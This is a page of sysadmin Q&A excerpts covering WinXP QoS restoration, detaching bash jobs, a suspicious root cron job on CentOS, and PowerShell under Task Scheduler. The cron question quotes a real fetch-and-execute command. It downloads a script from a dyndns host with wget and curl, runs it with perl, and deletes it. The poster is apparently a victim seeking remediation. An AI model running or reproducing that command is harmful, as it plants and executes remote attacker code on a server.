    I have a WinXP SP3 installation modified by nLite. This particular installation was stripped off the QoS Packet Scheduler. I was advised to remove QoS because of the overhead it produces or something like that. Now, I read this lifehacker post about windows maintenance, and it says that on the contrary, by doing so I may have done more harm than good: Disabling QoS in Windows XP: Rumor had it that Microsoft had permanently tied up 20 percent of your net bandwidth for Windows Update. They didn't, and those who disable QoS, or IPv6, in XP actually end up with some pretty harsh connectivity problems. I tend to believe this, and now I seek a way to reinstall QoS. I tried to install it by going to network adapter properties - install - service, but there is no QoS there. I have the original, untouched WinXP SP3 cd. So, is there a way to bring back QoS into my WinXP installation, preferably without reinstalling windows from scratch?

    Read the article

  • How to disconnect a running bash job from the shell in Linux?

    - by raven
    I have a script that starts a server on a remote VM. All works great until I close the shell where I executed the script. When the shell closes, so does the server. After some looking around I found the following: & will send the job to the background when executed with the symbol disown -h will disconnect the job from the shell and allow it to run regardless of the shell. The command I used is: ./startServer.sh nasb_wxscat160_catalog-4.1.6 1.0.8 > catalog-log.txt & disown -h When I closed the shell and checked using ps -ef | grep java to see if the job is still working I did see it in the list. However when I tried to connect to the server it was unresponsive. On deeper inspection, the log file was filled just until I closed the shell and using the ps -m flag I say the process jobs were not working. Has any one encountered some thing of this sort?

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

    Read the article

  • My powershell script wont save a file when run using Task Scheduler, do I need to specify a specific argument?

    - by EGr
    I have a script that downloads a temporary Excel file, copies parts of it to a new file, and saves it to a specific location on the network. The problem I'm having is that the new file is never created/saved. If I run the script locally (through cmd.exe, powershell, or powershell ise), it WILL save the file locally, or to the network. If I try running the script via a schedule or on-demand via Task Scheduler, the temporary file is created, but the final document is never created or saved. Is there a specific argument I need to pass, or anything I could be doing wrong? This is the command I'm currently using: powershell.exe -file C:\path\to\my\powershell\script\thescript.ps1 Since it calls environment variables, and other variables relative to the scripts positon, I also set "Start in" to C:\path\to\my\powershell\script\

    Read the article

< Previous Page | 36 37 38 39 40 41 42 43 44 45 46 47  | Next Page >